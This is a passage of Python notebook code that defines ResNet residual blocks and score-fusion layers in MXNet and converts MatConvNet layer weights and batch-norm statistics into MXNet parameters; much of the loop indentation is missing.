bn4b5_branch2b = mx.symbol.BatchNorm(name='bn4b5_branch2b', data=res4b5_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b5_branch2b_relu = mx.symbol.Activation(name='res4b5_branch2b_relu', data=bn4b5_branch2b , act_type='relu')
res4b5_branch2c = mx.symbol.Convolution(name='res4b5_branch2c', data=res4b5_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b5_branch2c = mx.symbol.BatchNorm(name='bn4b5_branch2c', data=res4b5_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b5 = mx.symbol.broadcast_add(name='res4b5', *[res4b4_relu,bn4b5_branch2c] )
res4b5_relu = mx.symbol.Activation(name='res4b5_relu', data=res4b5 , act_type='relu')
res4b6_branch2a = mx.symbol.Convolution(name='res4b6_branch2a', data=res4b5_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b6_branch2a = mx.symbol.BatchNorm(name='bn4b6_branch2a', data=res4b6_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b6_branch2a_relu = mx.symbol.Activation(name='res4b6_branch2a_relu', data=bn4b6_branch2a , act_type='relu')
res4b6_branch2b = mx.symbol.Convolution(name='res4b6_branch2b', data=res4b6_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b6_branch2b = mx.symbol.BatchNorm(name='bn4b6_branch2b', data=res4b6_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b6_branch2b_relu = mx.symbol.Activation(name='res4b6_branch2b_relu', data=bn4b6_branch2b , act_type='relu')
res4b6_branch2c = mx.symbol.Convolution(name='res4b6_branch2c', data=res4b6_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b6_branch2c = mx.symbol.BatchNorm(name='bn4b6_branch2c', data=res4b6_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b6 = mx.symbol.broadcast_add(name='res4b6', *[res4b5_relu,bn4b6_branch2c] )
res4b6_relu = mx.symbol.Activation(name='res4b6_relu', data=res4b6 , act_type='relu')
res4b7_branch2a = mx.symbol.Convolution(name='res4b7_branch2a', data=res4b6_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b7_branch2a = mx.symbol.BatchNorm(name='bn4b7_branch2a', data=res4b7_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b7_branch2a_relu = mx.symbol.Activation(name='res4b7_branch2a_relu', data=bn4b7_branch2a , act_type='relu')
res4b7_branch2b = mx.symbol.Convolution(name='res4b7_branch2b', data=res4b7_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b7_branch2b = mx.symbol.BatchNorm(name='bn4b7_branch2b', data=res4b7_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b7_branch2b_relu = mx.symbol.Activation(name='res4b7_branch2b_relu', data=bn4b7_branch2b , act_type='relu')
res4b7_branch2c = mx.symbol.Convolution(name='res4b7_branch2c', data=res4b7_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b7_branch2c = mx.symbol.BatchNorm(name='bn4b7_branch2c', data=res4b7_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b7 = mx.symbol.broadcast_add(name='res4b7', *[res4b6_relu,bn4b7_branch2c] )
res4b7_relu = mx.symbol.Activation(name='res4b7_relu', data=res4b7 , act_type='relu')
res4b8_branch2a = mx.symbol.Convolution(name='res4b8_branch2a', data=res4b7_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b8_branch2a = mx.symbol.BatchNorm(name='bn4b8_branch2a', data=res4b8_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b8_branch2a_relu = mx.symbol.Activation(name='res4b8_branch2a_relu', data=bn4b8_branch2a , act_type='relu')
res4b8_branch2b = mx.symbol.Convolution(name='res4b8_branch2b', data=res4b8_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b8_branch2b = mx.symbol.BatchNorm(name='bn4b8_branch2b', data=res4b8_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b8_branch2b_relu = mx.symbol.Activation(name='res4b8_branch2b_relu', data=bn4b8_branch2b , act_type='relu')
res4b8_branch2c = mx.symbol.Convolution(name='res4b8_branch2c', data=res4b8_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b8_branch2c = mx.symbol.BatchNorm(name='bn4b8_branch2c', data=res4b8_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b8 = mx.symbol.broadcast_add(name='res4b8', *[res4b7_relu,bn4b8_branch2c] )
res4b8_relu = mx.symbol.Activation(name='res4b8_relu', data=res4b8 , act_type='relu')
res4b9_branch2a = mx.symbol.Convolution(name='res4b9_branch2a', data=res4b8_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b9_branch2a = mx.symbol.BatchNorm(name='bn4b9_branch2a', data=res4b9_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b9_branch2a_relu = mx.symbol.Activation(name='res4b9_branch2a_relu', data=bn4b9_branch2a , act_type='relu')
res4b9_branch2b = mx.symbol.Convolution(name='res4b9_branch2b', data=res4b9_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b9_branch2b = mx.symbol.BatchNorm(name='bn4b9_branch2b', data=res4b9_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b9_branch2b_relu = mx.symbol.Activation(name='res4b9_branch2b_relu', data=bn4b9_branch2b , act_type='relu')
res4b9_branch2c = mx.symbol.Convolution(name='res4b9_branch2c', data=res4b9_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b9_branch2c = mx.symbol.BatchNorm(name='bn4b9_branch2c', data=res4b9_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b9 = mx.symbol.broadcast_add(name='res4b9', *[res4b8_relu,bn4b9_branch2c] )
res4b9_relu = mx.symbol.Activation(name='res4b9_relu', data=res4b9 , act_type='relu')
res4b10_branch2a = mx.symbol.Convolution(name='res4b10_branch2a', data=res4b9_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b10_branch2a = mx.symbol.BatchNorm(name='bn4b10_branch2a', data=res4b10_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b10_branch2a_relu = mx.symbol.Activation(name='res4b10_branch2a_relu', data=bn4b10_branch2a , act_type='relu')
res4b10_branch2b = mx.symbol.Convolution(name='res4b10_branch2b', data=res4b10_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b10_branch2b = mx.symbol.BatchNorm(name='bn4b10_branch2b', data=res4b10_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b10_branch2b_relu = mx.symbol.Activation(name='res4b10_branch2b_relu', data=bn4b10_branch2b , act_type='relu')
res4b10_branch2c = mx.symbol.Convolution(name='res4b10_branch2c', data=res4b10_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b10_branch2c = mx.symbol.BatchNorm(name='bn4b10_branch2c', data=res4b10_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b10 = mx.symbol.broadcast_add(name='res4b10', *[res4b9_relu,bn4b10_branch2c] )
res4b10_relu = mx.symbol.Activation(name='res4b10_relu', data=res4b10 , act_type='relu')
res4b11_branch2a = mx.symbol.Convolution(name='res4b11_branch2a', data=res4b10_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b11_branch2a = mx.symbol.BatchNorm(name='bn4b11_branch2a', data=res4b11_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b11_branch2a_relu = mx.symbol.Activation(name='res4b11_branch2a_relu', data=bn4b11_branch2a , act_type='relu')
res4b11_branch2b = mx.symbol.Convolution(name='res4b11_branch2b', data=res4b11_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b11_branch2b = mx.symbol.BatchNorm(name='bn4b11_branch2b', data=res4b11_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b11_branch2b_relu = mx.symbol.Activation(name='res4b11_branch2b_relu', data=bn4b11_branch2b , act_type='relu')
res4b11_branch2c = mx.symbol.Convolution(name='res4b11_branch2c', data=res4b11_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b11_branch2c = mx.symbol.BatchNorm(name='bn4b11_branch2c', data=res4b11_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b11 = mx.symbol.broadcast_add(name='res4b11', *[res4b10_relu,bn4b11_branch2c] )
res4b11_relu = mx.symbol.Activation(name='res4b11_relu', data=res4b11 , act_type='relu')
res4b12_branch2a = mx.symbol.Convolution(name='res4b12_branch2a', data=res4b11_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b12_branch2a = mx.symbol.BatchNorm(name='bn4b12_branch2a', data=res4b12_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b12_branch2a_relu = mx.symbol.Activation(name='res4b12_branch2a_relu', data=bn4b12_branch2a , act_type='relu')
res4b12_branch2b = mx.symbol.Convolution(name='res4b12_branch2b', data=res4b12_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b12_branch2b = mx.symbol.BatchNorm(name='bn4b12_branch2b', data=res4b12_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b12_branch2b_relu = mx.symbol.Activation(name='res4b12_branch2b_relu', data=bn4b12_branch2b , act_type='relu')
res4b12_branch2c = mx.symbol.Convolution(name='res4b12_branch2c', data=res4b12_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b12_branch2c = mx.symbol.BatchNorm(name='bn4b12_branch2c', data=res4b12_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b12 = mx.symbol.broadcast_add(name='res4b12', *[res4b11_relu,bn4b12_branch2c] )
res4b12_relu = mx.symbol.Activation(name='res4b12_relu', data=res4b12 , act_type='relu')
res4b13_branch2a = mx.symbol.Convolution(name='res4b13_branch2a', data=res4b12_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b13_branch2a = mx.symbol.BatchNorm(name='bn4b13_branch2a', data=res4b13_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b13_branch2a_relu = mx.symbol.Activation(name='res4b13_branch2a_relu', data=bn4b13_branch2a , act_type='relu')
res4b13_branch2b = mx.symbol.Convolution(name='res4b13_branch2b', data=res4b13_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b13_branch2b = mx.symbol.BatchNorm(name='bn4b13_branch2b', data=res4b13_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b13_branch2b_relu = mx.symbol.Activation(name='res4b13_branch2b_relu', data=bn4b13_branch2b , act_type='relu')
res4b13_branch2c = mx.symbol.Convolution(name='res4b13_branch2c', data=res4b13_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b13_branch2c = mx.symbol.BatchNorm(name='bn4b13_branch2c', data=res4b13_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b13 = mx.symbol.broadcast_add(name='res4b13', *[res4b12_relu,bn4b13_branch2c] )
res4b13_relu = mx.symbol.Activation(name='res4b13_relu', data=res4b13 , act_type='relu')
res4b14_branch2a = mx.symbol.Convolution(name='res4b14_branch2a', data=res4b13_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b14_branch2a = mx.symbol.BatchNorm(name='bn4b14_branch2a', data=res4b14_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b14_branch2a_relu = mx.symbol.Activation(name='res4b14_branch2a_relu', data=bn4b14_branch2a , act_type='relu')
res4b14_branch2b = mx.symbol.Convolution(name='res4b14_branch2b', data=res4b14_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b14_branch2b = mx.symbol.BatchNorm(name='bn4b14_branch2b', data=res4b14_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b14_branch2b_relu = mx.symbol.Activation(name='res4b14_branch2b_relu', data=bn4b14_branch2b , act_type='relu')
res4b14_branch2c = mx.symbol.Convolution(name='res4b14_branch2c', data=res4b14_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b14_branch2c = mx.symbol.BatchNorm(name='bn4b14_branch2c', data=res4b14_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b14 = mx.symbol.broadcast_add(name='res4b14', *[res4b13_relu,bn4b14_branch2c] )
res4b14_relu = mx.symbol.Activation(name='res4b14_relu', data=res4b14 , act_type='relu')
res4b15_branch2a = mx.symbol.Convolution(name='res4b15_branch2a', data=res4b14_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b15_branch2a = mx.symbol.BatchNorm(name='bn4b15_branch2a', data=res4b15_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b15_branch2a_relu = mx.symbol.Activation(name='res4b15_branch2a_relu', data=bn4b15_branch2a , act_type='relu')
res4b15_branch2b = mx.symbol.Convolution(name='res4b15_branch2b', data=res4b15_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b15_branch2b = mx.symbol.BatchNorm(name='bn4b15_branch2b', data=res4b15_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b15_branch2b_relu = mx.symbol.Activation(name='res4b15_branch2b_relu', data=bn4b15_branch2b , act_type='relu')
res4b15_branch2c = mx.symbol.Convolution(name='res4b15_branch2c', data=res4b15_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b15_branch2c = mx.symbol.BatchNorm(name='bn4b15_branch2c', data=res4b15_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b15 = mx.symbol.broadcast_add(name='res4b15', *[res4b14_relu,bn4b15_branch2c] )
res4b15_relu = mx.symbol.Activation(name='res4b15_relu', data=res4b15 , act_type='relu')
res4b16_branch2a = mx.symbol.Convolution(name='res4b16_branch2a', data=res4b15_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b16_branch2a = mx.symbol.BatchNorm(name='bn4b16_branch2a', data=res4b16_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b16_branch2a_relu = mx.symbol.Activation(name='res4b16_branch2a_relu', data=bn4b16_branch2a , act_type='relu')
res4b16_branch2b = mx.symbol.Convolution(name='res4b16_branch2b', data=res4b16_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b16_branch2b = mx.symbol.BatchNorm(name='bn4b16_branch2b', data=res4b16_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b16_branch2b_relu = mx.symbol.Activation(name='res4b16_branch2b_relu', data=bn4b16_branch2b , act_type='relu')
res4b16_branch2c = mx.symbol.Convolution(name='res4b16_branch2c', data=res4b16_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b16_branch2c = mx.symbol.BatchNorm(name='bn4b16_branch2c', data=res4b16_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b16 = mx.symbol.broadcast_add(name='res4b16', *[res4b15_relu,bn4b16_branch2c] )
res4b16_relu = mx.symbol.Activation(name='res4b16_relu', data=res4b16 , act_type='relu')
res4b17_branch2a = mx.symbol.Convolution(name='res4b17_branch2a', data=res4b16_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b17_branch2a = mx.symbol.BatchNorm(name='bn4b17_branch2a', data=res4b17_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b17_branch2a_relu = mx.symbol.Activation(name='res4b17_branch2a_relu', data=bn4b17_branch2a , act_type='relu')
res4b17_branch2b = mx.symbol.Convolution(name='res4b17_branch2b', data=res4b17_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b17_branch2b = mx.symbol.BatchNorm(name='bn4b17_branch2b', data=res4b17_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b17_branch2b_relu = mx.symbol.Activation(name='res4b17_branch2b_relu', data=bn4b17_branch2b , act_type='relu')
res4b17_branch2c = mx.symbol.Convolution(name='res4b17_branch2c', data=res4b17_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b17_branch2c = mx.symbol.BatchNorm(name='bn4b17_branch2c', data=res4b17_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b17 = mx.symbol.broadcast_add(name='res4b17', *[res4b16_relu,bn4b17_branch2c] )
res4b17_relu = mx.symbol.Activation(name='res4b17_relu', data=res4b17 , act_type='relu')
res4b18_branch2a = mx.symbol.Convolution(name='res4b18_branch2a', data=res4b17_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b18_branch2a = mx.symbol.BatchNorm(name='bn4b18_branch2a', data=res4b18_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b18_branch2a_relu = mx.symbol.Activation(name='res4b18_branch2a_relu', data=bn4b18_branch2a , act_type='relu')
res4b18_branch2b = mx.symbol.Convolution(name='res4b18_branch2b', data=res4b18_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b18_branch2b = mx.symbol.BatchNorm(name='bn4b18_branch2b', data=res4b18_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b18_branch2b_relu = mx.symbol.Activation(name='res4b18_branch2b_relu', data=bn4b18_branch2b , act_type='relu')
res4b18_branch2c = mx.symbol.Convolution(name='res4b18_branch2c', data=res4b18_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b18_branch2c = mx.symbol.BatchNorm(name='bn4b18_branch2c', data=res4b18_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b18 = mx.symbol.broadcast_add(name='res4b18', *[res4b17_relu,bn4b18_branch2c] )
res4b18_relu = mx.symbol.Activation(name='res4b18_relu', data=res4b18 , act_type='relu')
res4b19_branch2a = mx.symbol.Convolution(name='res4b19_branch2a', data=res4b18_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b19_branch2a = mx.symbol.BatchNorm(name='bn4b19_branch2a', data=res4b19_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b19_branch2a_relu = mx.symbol.Activation(name='res4b19_branch2a_relu', data=bn4b19_branch2a , act_type='relu')
res4b19_branch2b = mx.symbol.Convolution(name='res4b19_branch2b', data=res4b19_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b19_branch2b = mx.symbol.BatchNorm(name='bn4b19_branch2b', data=res4b19_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b19_branch2b_relu = mx.symbol.Activation(name='res4b19_branch2b_relu', data=bn4b19_branch2b , act_type='relu')
res4b19_branch2c = mx.symbol.Convolution(name='res4b19_branch2c', data=res4b19_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b19_branch2c = mx.symbol.BatchNorm(name='bn4b19_branch2c', data=res4b19_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b19 = mx.symbol.broadcast_add(name='res4b19', *[res4b18_relu,bn4b19_branch2c] )
res4b19_relu = mx.symbol.Activation(name='res4b19_relu', data=res4b19 , act_type='relu')
res4b20_branch2a = mx.symbol.Convolution(name='res4b20_branch2a', data=res4b19_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b20_branch2a = mx.symbol.BatchNorm(name='bn4b20_branch2a', data=res4b20_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b20_branch2a_relu = mx.symbol.Activation(name='res4b20_branch2a_relu', data=bn4b20_branch2a , act_type='relu')
res4b20_branch2b = mx.symbol.Convolution(name='res4b20_branch2b', data=res4b20_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b20_branch2b = mx.symbol.BatchNorm(name='bn4b20_branch2b', data=res4b20_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b20_branch2b_relu = mx.symbol.Activation(name='res4b20_branch2b_relu', data=bn4b20_branch2b , act_type='relu')
res4b20_branch2c = mx.symbol.Convolution(name='res4b20_branch2c', data=res4b20_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b20_branch2c = mx.symbol.BatchNorm(name='bn4b20_branch2c', data=res4b20_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b20 = mx.symbol.broadcast_add(name='res4b20', *[res4b19_relu,bn4b20_branch2c] )
res4b20_relu = mx.symbol.Activation(name='res4b20_relu', data=res4b20 , act_type='relu')
res4b21_branch2a = mx.symbol.Convolution(name='res4b21_branch2a', data=res4b20_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b21_branch2a = mx.symbol.BatchNorm(name='bn4b21_branch2a', data=res4b21_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b21_branch2a_relu = mx.symbol.Activation(name='res4b21_branch2a_relu', data=bn4b21_branch2a , act_type='relu')
res4b21_branch2b = mx.symbol.Convolution(name='res4b21_branch2b', data=res4b21_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b21_branch2b = mx.symbol.BatchNorm(name='bn4b21_branch2b', data=res4b21_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b21_branch2b_relu = mx.symbol.Activation(name='res4b21_branch2b_relu', data=bn4b21_branch2b , act_type='relu')
res4b21_branch2c = mx.symbol.Convolution(name='res4b21_branch2c', data=res4b21_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b21_branch2c = mx.symbol.BatchNorm(name='bn4b21_branch2c', data=res4b21_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b21 = mx.symbol.broadcast_add(name='res4b21', *[res4b20_relu,bn4b21_branch2c] )
res4b21_relu = mx.symbol.Activation(name='res4b21_relu', data=res4b21 , act_type='relu')
res4b22_branch2a = mx.symbol.Convolution(name='res4b22_branch2a', data=res4b21_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b22_branch2a = mx.symbol.BatchNorm(name='bn4b22_branch2a', data=res4b22_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b22_branch2a_relu = mx.symbol.Activation(name='res4b22_branch2a_relu', data=bn4b22_branch2a , act_type='relu')
res4b22_branch2b = mx.symbol.Convolution(name='res4b22_branch2b', data=res4b22_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b22_branch2b = mx.symbol.BatchNorm(name='bn4b22_branch2b', data=res4b22_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b22_branch2b_relu = mx.symbol.Activation(name='res4b22_branch2b_relu', data=bn4b22_branch2b , act_type='relu')
res4b22_branch2c = mx.symbol.Convolution(name='res4b22_branch2c', data=res4b22_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b22_branch2c = mx.symbol.BatchNorm(name='bn4b22_branch2c', data=res4b22_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b22 = mx.symbol.broadcast_add(name='res4b22', *[res4b21_relu,bn4b22_branch2c] )
res4b22_relu = mx.symbol.Activation(name='res4b22_relu', data=res4b22 , act_type='relu')
score_res4 = mx.symbol.Convolution(name='score_res4', data=res4b22_relu , num_filter=125, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=False)
score4 = mx.symbol.Deconvolution(name='score4', data=score_res4 , num_filter=125, pad=(0, 0), kernel=(4,4), stride=(2,2), no_bias=True)
score_res3 = mx.symbol.Convolution(name='score_res3', data=res3b3_relu , num_filter=125, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=False)
# As the convolution blocks pad their input and downsample their output, the deconvolution block should upsample its input and CROP its output.
# The tricky part is cropping the deconvolution result with the 'slice' op, equivalent to the crop param [1,2,1,2] of ConvTranspose in matconvnet.
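# Concretely (assuming the 1x3x224x224 input used for shape inference below):
# score_res4 is 14x14, the 4x4/stride-2 deconvolution maps 14 -> (14-1)*2+4 = 30,
# slicing rows/cols 1..-2 leaves 27, and the center Crop trims score_res3's
# 28x28 map to the matching 27x27 before the fusion add.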
score4_sliced = mx.symbol.slice(name='score4_sliced', data=score4, begin=(0,0,1,1), end=(None,None,-2,-2))
crop = mx.symbol.Crop(name='crop', *[score_res3, score4_sliced] , center_crop=True)
fusex = mx.symbol.broadcast_add(name='fusex', *[score4_sliced,crop] )
# In[67]:
arg_shapes, _, aux_shapes = fusex.infer_shape(data=(1,3,224,224))
arg_names = fusex.list_arguments()
aux_names = fusex.list_auxiliary_states()
arg_shape_dic = dict(zip(arg_names, arg_shapes))
aux_shape_dic = dict(zip(aux_names, aux_shapes))
arg_params = {}
aux_params = {}
# In[70]:
layers = net['layers'][0][0][0]
mat_params = net['params'][0][0][0]
mat_params_dict = {}
for p in mat_params:
mat_params_dict[p[0][0]] = p[1]
# In[124]:
for k, layer in enumerate(layers):
type_string = ''
param_string = ''
layer_name = layer[0][0]
layer_type = layer[1][0]
layer_inputs = []
layer_outputs = []
layer_params = []
layer_inputs_count=layer[2][0].shape[0]
for i in range(layer_inputs_count):
layer_inputs.append(layer[2][0][i][0])
layer_outputs_count=layer[3][0].shape[0]
for i in range(layer_outputs_count):
layer_outputs.append(layer[3][0][i][0])
if layer[4].shape[0] > 0:
layer_params_count = layer[4][0].shape[0]
for i in range(layer_params_count):
layer_params.append(layer[4][0][i][0])
if layer_type == u'dagnn.Conv':
nchw = layer[5][0][0][0][0]
hasBias = layer[5][0][0][1][0][0]
pad = layer[5][0][0][3][0]
stride = layer[5][0][0][4][0]
dilate = layer[5][0][0][5][0]
type_string = 'mx.symbol.Convolution'
wmat = mat_params_dict[layer_name+'_filter']
wmat = np.transpose(wmat, [3,2,0,1]) # matlab array is (h w c n) so need to swap axes
arg_params[layer_name+'_weight'] = mx.nd.array(wmat)
if hasBias:
bias = mat_params_dict[layer_name+'_bias'][0]
arg_params[layer_name+'_bias'] = mx.nd.array(bias)
elif layer_type == u'dagnn.BatchNorm':
        epsilon = layer[5][0][0][1][0][0]
type_string = 'mx.symbol.BatchNorm'
gamma = mat_params_dict[layer_name+'_mult'][:,0]
beta = mat_params_dict[layer_name+'_bias'][:,0]
moments = mat_params_dict[layer_name+'_moments']
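        # MatConvNet stores the moments as two columns [mean, sigma] with
        # sigma = sqrt(var + eps), so the variance is recovered as sigma^2 - eps.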
moving_mean = moments[:,0]
        moving_var = moments[:,1] * moments[:,1] - epsilon
arg_params[layer_name+'_gamma'] = mx.nd.array(gamma)
arg_params[layer_name+'_beta'] = mx.nd.array(beta)
aux_params[layer_name+'_moving_mean'] = mx.nd.array(moving_mean)
aux_params[layer_name+'_moving_var'] = mx.nd.array(moving_var)
elif layer_type == u'dagnn.ConvTranspose':
nchw = layer[5][0][0][0][0]
hasBias = layer[5][0][0][1][0][0]
upsample = layer[5][0][0][2][0]
crop = layer[5][0][0][3][0]
type_string = 'mx.symbol.Deconvolution'
wmat = mat_params_dict[layer_name+'f']
wmat = np.transpose(wmat, [3,2,0,1]) # matlab array is (h w c n) so need to swap axes
arg_params[layer_name+'_weight']=mx.nd.array(wmat)
elif layer_type == u'dagnn.Pooling':
        method = layer[5][0][0][0][0]
